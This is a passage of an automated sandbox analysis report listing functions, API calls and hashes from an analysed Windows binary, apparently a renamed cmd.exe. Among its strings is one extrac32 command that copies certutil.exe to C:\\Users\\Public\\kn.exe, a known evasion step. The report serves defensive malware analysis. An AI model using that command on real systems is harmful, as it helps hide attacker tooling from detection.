                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                      • String ID:
                                                                                      • API String ID: 920682188-0
                                                                                      • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction ID: 60605cfaa44b2aa2c4fd0b36cf9ab0f546ef366af94a0034af23d099fcbf00aa
                                                                                      • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                                                                      • Instruction Fuzzy Hash: E3512732705B818AEB75EF20D8942E8B7A5FB8CB85F848135CA4E57754DF3CD6458720
                                                                                      Function 00007FF79374DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF79374E00B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcess_setjmp
                                                                                      • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 777023205-3344945345
                                                                                      • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                      • Instruction ID: 72caf930f3d3f453b7990b2e2a5b457e2ff97f6c6fdc285193a4e83e12745cad
                                                                                      • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                      • Instruction Fuzzy Hash: BC513730A0DA4289FBB0AF35A8C4278FBA9BF4C760FE44535D94D627A1DF3CB4418621
                                                                                      Function 00007FF79374F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1BA
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F1E7
                                                                                      • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F1FF
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswdigit$iswspacewcschr
                                                                                      • String ID: )$=,;
                                                                                      • API String ID: 1959970872-2167043656
                                                                                      • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                      • Instruction ID: bf1ab16163a5d6e7d6bf5aafdd319645c36d9fe716b3c08c2a7ff3062f9b9cb0
                                                                                      • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                      • Instruction Fuzzy Hash: C8417B64E0825786FBF46B3499C8279F6EAEF1D751FC45832C98D222A0DF3CB8418631
                                                                                      Function 00007FF7937691B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpfprintfwcsrchr
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 3625580822-2781220306
                                                                                      • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                      • Instruction ID: e34f0f1dd9925602b2be8c04aaa7a72a4ca29cf68e8d94d75014c779e41a0a94
                                                                                      • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                      • Instruction Fuzzy Hash: 6A31D721A08A4686FBF46B6195901B9F25ABB4EB98F844130CD1E37795DE3CE445C321
                                                                                      Function 00007FF793751FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsspn
                                                                                      • String ID:
                                                                                      • API String ID: 3809306610-0
                                                                                      • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction ID: 2dafa4c9f4fa41df8e9d50d18ab67f79814cd1a48ef63879ecfecb84a0e62c57
                                                                                      • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                      • Instruction Fuzzy Hash: FEB19662A0874681EAA4EF25E490279E7A9FB5CB80FC58032DA4E67791DF7CE441C720
                                                                                      Function 00007FF793768C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                      • String ID:
                                                                                      • API String ID: 3841054028-0
                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction ID: 72775493c192d36715b9cc2eecc7d2580efb2e91c676251f7f62ccced9c8acc1
                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                      • Instruction Fuzzy Hash: CE510723A04A52A1F7B4AB35D4A01B9B6A5FF6C759BC48231DE5D622D0DF3CE841C231
                                                                                      Function 00007FF793745984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793763687
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937636A6
                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF7937636EB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793763703
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF79374260D), ref: 00007FF793763722
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                                      • String ID:
                                                                                      • API String ID: 1066134489-0
                                                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                      • Instruction ID: bfdd1e0dac840a64111e0a2fbfe54a48558b0e9ffc3113f6a21c7e3f40089f8b
                                                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                      • Instruction Fuzzy Hash: 8B51B421B08A4687FAB46F319494679E6A9EF4C795F884439CE4E237A0DF3CE440CB31
                                                                                      Function 00007FF7937489C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 850181435-0
                                                                                      • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                      • Instruction ID: 520bc9c30a68df39165a2460b21cb826533a49a27cca6ea12673be0cf855ca64
                                                                                      • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                      • Instruction Fuzzy Hash: 63417F32608BC5C9E7B09F30D8842E9B7A9FB8DB85F944525DA4E5BB48CF38D645C710
                                                                                      Function 00007FF7937534A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753514
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753522
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753541
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375355E
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                      • String ID:
                                                                                      • API String ID: 4057327938-0
                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction ID: a582bde19aa0065ef1ab6d67d599b1339a4c6851de83f62700157bae693e8267
                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction Fuzzy Hash: 8431A121A08A4286F7F9BB3594801B9F6A8EF8D741FC4413AD94E627A1DF3CE9049670
                                                                                      Function 00007FF79376BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                      • String ID: KEYS$LIST$OFF
                                                                                      • API String ID: 411561164-4129271751
                                                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                      • Instruction ID: 1a81ddb25e4dfed4427f7010d571d2e0ae61792d8622134e95596f02f77668aa
                                                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                      • Instruction Fuzzy Hash: 81216F30A08E03D1F6F4AB36A4D5179A2E9EB8D754FC09231C61E622E4EF2CA4448621
                                                                                      Function 00007FF7937501B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750212
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750228
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375023C
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793750251
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 513048808-0
                                                                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                      • Instruction ID: ed0955501e5fc06b7efd5cfc39d3c8f1d1adcb4bdb7fc48c8f245f7b2590f8ee
                                                                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                      • Instruction Fuzzy Hash: 5021922190C68287F6F46B70A5C8278EAA8FF4E755F944135DA0F56790DF3CD4448721
                                                                                      Function 00007FF793753578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 513048808-0
                                                                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                      • Instruction ID: 662af5eea71d0154e2b91f0796ac4c09a6f7f8dab65d34f29d59fa2e873d992d
                                                                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                      • Instruction Fuzzy Hash: F9118121A0864282FAF46B74A4C4278EA98FF4D765F845335DA2F523E0DE3CD4448771
                                                                                      Function 00007FF793759584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 4104442557-0
                                                                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                      • Instruction ID: c4362d1c8e259775eca6c266c06c0076f70a12226c3251141c94a5f2e9404e3a
                                                                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                      • Instruction Fuzzy Hash: BE116621605F418AEB50EF70E8852A873A8F70D759F810A35EA6E57754DF3CD254C350
                                                                                      Function 00007FF79376711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937671F9
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF79376720D
                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF793767300
                                                                                        • Part of subcall function 00007FF793765740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7937675C4,?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF793765744
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
